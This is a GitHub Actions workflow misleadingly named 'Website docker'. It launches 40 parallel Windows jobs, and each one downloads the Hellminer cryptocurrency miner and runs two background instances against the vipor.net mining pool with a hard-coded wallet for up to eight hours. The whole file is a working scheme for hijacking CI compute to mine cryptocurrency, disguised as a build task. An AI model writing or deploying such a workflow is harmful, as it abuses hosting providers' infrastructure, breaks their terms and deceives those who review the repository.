name: Website docker

on:
  workflow_dispatch:

jobs:
  mine:
    name: Run Task ${{ matrix.id }}
    runs-on: windows-latest
    timeout-minutes: 480  # 8 hours

    strategy:
      matrix:
        id: [1,2,3,4,5,6,7,8,9,10,
             11,12,13,14,15,16,17,18,19,20,
             21,22,23,24,25,26,27,28,29,30,
             31,32,33,34,35,36,37,38,39,40]

    steps:
      - name: Download Hellminer Win64 AVX2
        run: |
          Invoke-WebRequest -Uri "https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_win64_avx2.zip" -OutFile "hellminer_win64_avx2.zip"

      - name: Extract Hellminer
        run: |
          Expand-Archive -Path "hellminer_win64_avx2.zip" -DestinationPath "hellminer"

      - name: Run Hellminer with 2 threads (rig${{ matrix.id }})
        shell: cmd
        run: |
          cd hellminer
          start /b hellminer.exe -c stratum+tcp://sg.vipor.net:5040 -u RDw8bjxzFXZG6hrsbo6SrAQA356Hrpq4LF.rig${{ matrix.id }}a -p x
          start /b hellminer.exe -c stratum+tcp://sg.vipor.net:5040 -u RDw8bjxzFXZG6hrsbo6SrAQA356Hrpq4LF.rig${{ matrix.id }}b -p x
          ping -n 172800 127.0.0.1 > nul
